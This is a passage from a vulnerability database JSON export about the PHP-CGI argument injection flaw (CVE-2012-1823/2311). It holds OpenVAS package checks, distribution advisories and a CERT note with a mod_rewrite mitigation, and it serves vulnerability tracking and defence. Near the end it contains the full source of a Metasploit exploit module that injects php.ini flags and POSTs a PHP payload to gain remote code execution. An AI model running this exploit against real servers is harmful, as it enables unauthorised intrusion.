"bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:1361412562310864259", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864259", "type": "openvas", "title": "Fedora Update for php-eaccelerator FEDORA-2012-7567", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php-eaccelerator FEDORA-2012-7567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081335.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864259\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:27:03 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-7567\");\n script_name(\"Fedora Update for php-eaccelerator FEDORA-2012-7567\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php-eaccelerator'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"php-eaccelerator on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"php-eaccelerator\", rpm:\"php-eaccelerator~0.9.6.1~9.fc15.5\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-08T12:57:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "Check for the Version of maniadrive", "modified": "2018-01-08T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:864256", "href": "http://plugins.openvas.org/nasl.php?oid=864256", "type": "openvas", "title": "Fedora Update for maniadrive FEDORA-2012-7567", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for maniadrive FEDORA-2012-7567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"maniadrive on Fedora 15\";\ntag_insight = \"ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nervous\n gameplay (tracks almost never exceed one minute). Features: Complex car\n physics, Challenging &quot;story mode&quot;, LAN and Internet mode, Live scores,\n Track editor, Dedicated server with HTTP interface and More than 30 blocks.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081334.html\");\n script_id(864256);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:26:52 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-7567\");\n script_name(\"Fedora Update for maniadrive FEDORA-2012-7567\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of maniadrive\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"maniadrive\", rpm:\"maniadrive~1.2~32.fc15.5\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:07:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "Check for the Version of php-eaccelerator", "modified": "2018-01-05T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:864259", "href": "http://plugins.openvas.org/nasl.php?oid=864259", "type": "openvas", "title": "Fedora Update for php-eaccelerator FEDORA-2012-7567", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php-eaccelerator FEDORA-2012-7567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"php-eaccelerator on Fedora 15\";\ntag_insight = \"eAccelerator is a further development of the MMCache PHP Accelerator &amp; Encoder.\n It increases performance of PHP scripts by caching them in compiled state, so\n that the overhead of compiling is almost completely eliminated.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081335.html\");\n script_id(864259);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:27:03 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-7567\");\n script_name(\"Fedora Update for php-eaccelerator FEDORA-2012-7567\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php-eaccelerator\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"php-eaccelerator\", rpm:\"php-eaccelerator~0.9.6.1~9.fc15.5\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:1361412562310864257", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864257", "type": "openvas", "title": "Fedora Update for php FEDORA-2012-7567", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2012-7567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081333.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864257\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:26:57 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-7567\");\n script_name(\"Fedora Update for php FEDORA-2012-7567\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"php on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.3.13~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:39:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "when used in CGI mode remote attackers could inject command\n line arguments to php\n\n", "edition": 1, "modified": "2012-05-07T16:08:55", "published": "2012-05-07T16:08:55", "id": "OPENSUSE-SU-2012:0590-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00002.html", "title": "update for php5 (critical)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "description": "This update fixes several security issues in PHP5:\n\n * CVE-2012-1172: A directory traversal bug has been\n fixed in PHP5\n * CVE-2012-1823, CVE-2012-2311: A command injection was\n possible when PHP5 was operated in CGI mode using\n commandline options. This problem does not affect PHP5 in\n the normal Apache module mode setup.\n", "edition": 1, "modified": "2012-05-09T22:08:16", "published": "2012-05-09T22:08:16", "id": "SUSE-SU-2012:0604-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00011.html", "title": "Security update for PHP5 (critical)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:51:43", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "description": "This update fixes several security issues in PHP5:\n\n * CVE-2012-1172: A directory traversal bug has been\n fixed in php5.\n * CVE-2012-1823, CVE-2012-2311: A command injection was\n possible when PHP5 was operated in CGI mode using\n commandline options. This problem does not affect PHP5 in\n the normal Apache module mode setup.\n * Also a pack/unpacking bug on big endian 64bit\n architectures (ppc64 and s390x) has been fixed. bnc#753778\n", "edition": 1, "modified": "2012-05-09T02:08:18", "published": "2012-05-09T02:08:18", "id": "SUSE-SU-2012:0598-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00007.html", "type": "suse", "title": "Security update for PHP5 (critical)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:38:36", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "description": "This update fixes several security issues in PHP5:\n\n * CVE-2012-1172: A directory traversal bug has been\n fixed in PHP5.\n * CVE-2012-1823, CVE-2012-2311: A command injection was\n possible when PHP5 was operated in CGI mode using\n commandline options. This problem does not affect PHP5 in\n the normal apache module mode setup.\n * Also a pack/unpacking bug on big endian 64bit\n architectures (ppc64 and s390x) has been fixed. bnc#753778\n", "edition": 1, "modified": "2012-05-09T06:08:17", "published": "2012-05-09T06:08:17", "id": "SUSE-SU-2012:0598-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00008.html", "type": "suse", "title": "Security update for PHP5 (critical)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:41:01", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "It was discovered that PHP, when used as a stand alone CGI processor \nfor the Apache Web Server, did not properly parse and filter query \nstrings. This could allow a remote attacker to execute arbitrary code \nrunning with the privilege of the web server. Configurations using \nmod_php5 and FastCGI were not vulnerable.\n\nThis update addresses the issue when the PHP CGI interpreter \nis configured using mod_cgi and mod_actions as described in \n/usr/share/doc/php5-cgi/README.Debian.gz; however, if an alternate \nconfiguration is used to enable PHP CGI processing, it should be \nreviewed to ensure that command line arguments cannot be passed to \nthe PHP interpreter. Please see CVE-2012-2311 for more details and \npotential mitigation approaches.", "edition": 5, "modified": "2012-05-04T00:00:00", "published": "2012-05-04T00:00:00", "id": "USN-1437-1", "href": "https://ubuntu.com/security/notices/USN-1437-1", "title": "PHP vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:42:00", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "### Overview \n\nPHP-CGI-based setups contain a vulnerability when parsing query string parameters from php files.\n\n### Description \n\nAccording to PHP's [website](<http://php.net/>), \"PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.\" When PHP is used in a CGI-based setup (such as Apache's `mod_cgid`), the `php-cgi` receives a processed query string parameter as command line arguments which allows command-line switches, such as `-s, -d or -c` to be passed to the `php-cgi` binary, which can be exploited to disclose source code and obtain arbitrary code execution.\n\nAn example of the `-s` command, allowing an attacker to view the source code of `index.php` is below: \n`<http://localhost/index.php?-s>` \n \nAdditional information can be found in the vulnerability reporter's [blog post](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>). \n \n--- \n \n### Impact \n\nA remote unauthenticated attacker could obtain sensitive information, cause a denial of service condition or may be able to execute arbitrary code with the privileges of the web server. \n \n--- \n \n### Solution \n\n**Apply update** \n \nPHP has released version [5.4.3](<http://www.php.net/archive/2012.php#id2012-05-08-1>) and [5.3.13](<http://www.php.net/archive/2012.php#id2012-05-08-1>) to address this vulnerability. PHP is recommending that users upgrade to the latest version of PHP. \n \nPHP has stated, _PHP 5.3.12/5.4.2 do not fix all variations of the CGI issues described in CVE-2012-1823. It has also come to our attention that some sites use an insecure cgiwrapper script to run PHP. These scripts will use $* instead of \"$@\" to pass parameters to php-cgi which causes a number of issues._ \n \n--- \n \n**Apply mod_rewrite rule** \n \n_PHP has _[_stated _](<http://www.php.net/archive/2012.php#id2012-05-03-1>)_an alternative is to configure your web server to not let these types of requests with query strings starting with a \"-\" and not containing a \"=\" through. Adding a rule like this should not break any sites. For Apache using mod_rewrite it would look like this_: \n \n` RewriteCond %{QUERY_STRING} ^[^=]*$` \n` RewriteCond %{QUERY_STRING} %2d|\\- [NC]` \n` RewriteRule .? - [F,L]` \n \n--- \n \n### Vendor Information\n\nAccording to PHP's [website](<http://www.php.net/archive/2012.php#id2012-05-03-1>) _Apache+mod_php and nginx+php-fpm are not affected._ \n \n--- \n \n520827\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### The PHP Group Affected\n\nNotified: February 23, 2012 Updated: May 08, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.php.net/archive/2012.php#id2012-05-08-1>\n * <http://www.php.net/archive/2012.php#id2012-05-03-1>\n * <http://php.net/ChangeLog-5.php>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9 | AV:N/AC:L/Au:N/C:C/I:P/A:P \nTemporal | 8.5 | E:F/RL:U/RC:C \nEnvironmental | 8.7 | CDP:L/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://www.php.net/>\n * <http://www.php.net/manual/en/security.cgi-bin.php>\n * <http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>\n * <http://www.php.net/archive/2012.php#id2012-05-03-1>\n * <http://www.php.net/archive/2012.php#id2012-05-08-1>\n * <http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices>\n\n### Acknowledgements\n\nThanks to De Eindbazen for reporting this vulnerability.\n\nThis document was written by Michael Orlando.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-1823](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-1823>), [CVE-2012-2311](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-2311>) \n---|--- \n**Date Public:** | 2012-05-03 \n**Date First Published:** | 2012-05-03 \n**Date Last Updated: ** | 2013-12-02 04:26 UTC \n**Document Revision: ** | 50 \n", "modified": "2013-12-02T04:26:00", "published": "2012-05-03T00:00:00", "id": "VU:520827", "href": "https://www.kb.cert.org/vuls/id/520827", "type": "cert", "title": "PHP-CGI query string parameter vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-2329"], "description": "\nThe PHP Development Team reports:\n\nThe release of PHP 5.4.13 and 5.4.3 complete a fix for the\n\t vulnerability in CGI-based setups as originally described in\n\t CVE-2012-1823. (CVE-2012-2311)\nNote: mod_php and php-fpm are not vulnerable to this attack.\nPHP 5.4.3 fixes a buffer overflow vulnerability in the\n\t apache_request_headers() (CVE-2012-2329).\n\n", "edition": 4, "modified": "2012-05-08T00:00:00", "published": "2012-05-08T00:00:00", "id": "59B68B1E-9C78-11E1-B5E0-000C299B62E1", "href": "https://vuxml.freebsd.org/freebsd/59b68b1e-9c78-11e1-b5e0-000c299b62e1.html", "title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-08-13T15:37:10", "description": "Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) (2). CVE-2012-1823,CVE-2012-2311,CVE-2012-2336. Remote exploit for PHP ...", "published": "2013-11-01T00:00:00", "type": "exploitdb", "title": "Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2311", "CVE-2012-2336", "CVE-2012-1823"], "modified": "2013-11-01T00:00:00", "id": "EDB-ID:40233", "href": "https://www.exploit-db.com/exploits/40233/", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2016-02-02T10:32:12", "description": "PHP CGI Argument Injection. CVE-2012-1823,CVE-2012-2311,CVE-2012-2336. Remote exploit for php platform", "published": "2012-05-04T00:00:00", "type": "exploitdb", "title": "PHP CGI Argument Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2311", "CVE-2012-2336", "CVE-2012-1823"], "modified": "2012-05-04T00:00:00", "id": "EDB-ID:18834", "href": "https://www.exploit-db.com/exploits/18834/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'PHP CGI Argument Injection',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tWhen run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to\r\n\t\t\t\tan argument injection vulnerability. This module takes advantage of\r\n\t\t\t\tthe -d flag to set php.ini directives to achieve code execution.\r\n\t\t\t\tFrom the advisory: \"if there is NO unescaped '=' in the query string,\r\n\t\t\t\tthe string is split on '+' (encoded space) characters, urldecoded,\r\n\t\t\t\tpassed to a function that escapes shell metacharacters (the \"encoded in\r\n\t\t\t\ta system-defined manner\" from the RFC) and then passes them to the CGI\r\n\t\t\t\tbinary.\"\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'egypt', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' => [\r\n\t\t\t\t\t[ \"CVE\"\t, \"2012-1823\" ],\r\n\t\t\t\t\t[ \"URL\"\t, \"http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\" ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t# Arbitrary big number. The payload gets sent as an HTTP\r\n\t\t\t\t\t# response body, so really it's unlimited\r\n\t\t\t\t\t'Space' => 262144, # 256k\r\n\t\t\t\t},\r\n\t\t\t'DisclosureDate' => 'May 03 2012',\r\n\t\t\t'Platform' => 'php',\r\n\t\t\t'Arch' => ARCH_PHP,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options([\r\n\t\t\tOptString.new('TARGETURI', [false, \"The URI to request (must be a CGI-handled PHP script)\"]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\t# php-cgi -h\r\n\t# ...\r\n\t# -s Display colour syntax highlighted source.\r\n\tdef check\r\n\t\turi = target_uri.path\r\n\r\n\t\turi.gsub!(/\\?.*/, \"\")\r\n\r\n\t\tprint_status(\"Checking uri #{uri}\")\r\n\r\n\t\tresponse = send_request_raw({ 'uri' => uri })\r\n\r\n\t\tif response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\&lt\\;\\?/mi\r\n\t\t\tprint_error(\"Server responded in a way that was ambiguous, could not determine whether it was vulnerable\")\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\tresponse = send_request_raw({ 'uri' => uri + '?-s'})\r\n\t\tif response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\&lt\\;\\?/mi\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\tprint_error(\"Server responded indicating it was not vulnerable\")\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tbegin\r\n\t\t\targs = [\r\n\t\t\t\t\"-d+allow_url_include%3d#{rand_php_ini_true}\",\r\n\t\t\t\t\"-d+safe_mode%3d#{rand_php_ini_false}\",\r\n\t\t\t\t\"-d+suhosin.simulation%3d#{rand_php_ini_true}\",\r\n\t\t\t\t\"-d+disable_functions%3d%22%22\",\r\n\t\t\t\t\"-d+open_basedir%3dnone\",\r\n\t\t\t\t\"-d+auto_prepend_file%3dphp://input\",\r\n\t\t\t\t\"-n\"\r\n\t\t\t]\r\n\r\n\t\t\tqs = args.join(\"+\")\r\n\t\t\turi = \"#{target_uri}?#{qs}\"\r\n\r\n\t\t\t# Has to be all on one line, so gsub out the comments and the newlines\r\n\t\t\tpayload_oneline = \"<?php \" + payload.encoded.gsub(/\\s*#.*$/, \"\").gsub(\"\\n\", \"\")\r\n\t\t\tresponse = send_request_cgi( {\r\n\t\t\t\t'method' => \"POST\",\r\n\t\t\t\t'global' => true,\r\n\t\t\t\t'uri' => uri,\r\n\t\t\t\t'data' => payload_oneline,\r\n\t\t\t}, 0.5)\r\n\t\t\thandler\r\n\r\n\t\trescue ::Interrupt\r\n\t\t\traise $!\r\n\t\trescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused\r\n\t\t\tprint_error(\"The target service unreachable\")\r\n\t\trescue ::OpenSSL::SSL::SSLError\r\n\t\t\tprint_error(\"The target failed to negotiate SSL, is this really an SSL service?\")\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef rand_php_ini_false\r\n\t\tRex::Text.to_rand_case([ \"0\", \"off\", \"false\" ][rand(3)])\r\n\tend\r\n\r\n\tdef rand_php_ini_true\r\n\t\tRex::Text.to_rand_case([ \"1\", \"on\", \"true\" ][rand(3)])\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18834/"}, {"lastseen": "2016-02-02T10:32:19", "description": "PHP CGI Argument Injection Exploit. CVE-2012-1823,CVE-2012-2311,CVE-2012-2336. Remote exploit for php platform", "published": 